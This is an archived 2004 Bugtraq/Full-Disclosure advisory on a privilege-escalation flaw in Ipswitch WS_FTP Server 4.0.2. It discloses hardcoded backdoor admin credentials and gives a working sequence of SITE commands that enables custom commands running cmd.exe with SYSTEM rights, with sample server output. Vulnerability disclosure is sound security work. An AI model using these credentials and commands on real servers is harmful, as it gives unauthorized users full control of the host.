Open the WS_FTP Server backdoor to SYSTEM

From: Hugh Mann (hughmann_at_hotmail.com)
Date: 03/23/04

  • Next message: Fable: "More Cpanel Vuls (cross site scripting)"
    To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    Date: Tue, 23 Mar 2004 07:11:58 +0000
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Advisory Name: Open the WS_FTP Server backdoor to SYSTEM
    Impact : Privilege escalation
    Discovered by: Hugh Mann hughmann@hotmail.com
    Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Description
    ~~~~~~~~~~~
    Any local user or any remote user who can execute programs on the FTP server
    as any user can start programs on the FTP server with the SYSTEM privilege.

    Details
    ~~~~~~~
    There are two WS_FTP Server options only the FTP system administrator can
    change. When enabled a FTP system administrator can edit user-defined SITE
    FTP commands. These user-defined SITE commands execute a program of the FTP
    system admin's choice. To protect the FTP sites, these options can only be
    controlled by a local FTP system administrator using the iftpmgr.exe
    program. It's not possible for a remote FTP system admin to enable these
    options through the iftpmgr.exe program. However, it's possible for a FTP
    system administrator to enable these options with a special WS_FTP Server
    SITE command. Ipswitch forgot to mask out the bits that enable these options
    before saving the new Flags when it receives a new SITE SETS (Set Site
    Options) command from a remote FTP system administrator.

    A "remote" FTP system admin is any FTP system admin using FTP/TELNET to
    connect to the server, which includes local users. If the remote user
    doesn't have the FTP system admin password but can run a program on the FTP
    server as any user, or if the user is a local user, the user can log in as
    the FTP system administrator by using a backdoor.

    FTP System Administrator backdoor: Any local user, or any remote user who
    can run programs on the FTP server as any user, can log in as the FTP System
    Administrator by using a backdoor.

    RealName: Local Session Manager
    Username: XXSESS_MGRYY
    Password: X#1833

    The user must have an IP equal to 127.0.0.1 and must connect to server IP
    127.0.0.1 or the login will fail.

    Exploit
    ~~~~~~~
    Use telnet/ftp to log in as the FTP system admin or use the backdoor. Enable
    remote editing of SITE cmds/events (exec files). This is off by default, but
    can be enabled by a remote ftp admin. First use the SITE List Site Options
    command:

            SITE LSTC
            220
    C:\iFtpSvc<\t>C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>0<\t>1460<\t>0<\t>16384<\t>C:\iFtpSvc\Security<\t>0

    <\t> means tab, or byte 0x09.

    Write down the 2nd to 8th site options you find there. Change the 5th Flags
    option by OR'ing it with 0x180. Now put the 2nd to 8th options on the next
    line, each option separated by a tab, except for the first option right
    after "SITE SETS" which should have a space just before it:

            SITE SETS C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>384<\t>1460<\t>0<\t>16384
            220 options set

    Now iftpmgr.exe can be used to remotely control all site options. I'll show
    how to manually add a SITE cmd we can use without using iftpmgr.exe. The
    command to do that is:

            SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
            220 site command modified

    <HostName> is the first name displayed before you log in to the FTP. 3V1L is
    the name of the new SITE command. Flags = 16 means write output to the
    screen.

            SITE 3V1L
            200-Command Started
            200-yup
            200 SITE command execution successful

    _________________________________________________________________
    Find a broadband plan that fits. Great local deals on high-speed Internet
    access. http://click.atdmt.com/AVE/go/onm00200360ave/direct/01/


  • Next message: Fable: "More Cpanel Vuls (cross site scripting)"

    Relevant Pages

    • [Full-Disclosure] Open the WS_FTP Server backdoor to SYSTEM
      ... Open the WS_FTP Server backdoor to SYSTEM ... Any local user or any remote user who can execute programs on the FTP server ... When enabled a FTP system administrator can edit user-defined SITE ...
      (Full-Disclosure)
    • Open the WS_FTP Server backdoor to SYSTEM
      ... Open the WS_FTP Server backdoor to SYSTEM ... Any local user or any remote user who can execute programs on the FTP server ... When enabled a FTP system administrator can edit user-defined SITE ...
      (Full-Disclosure)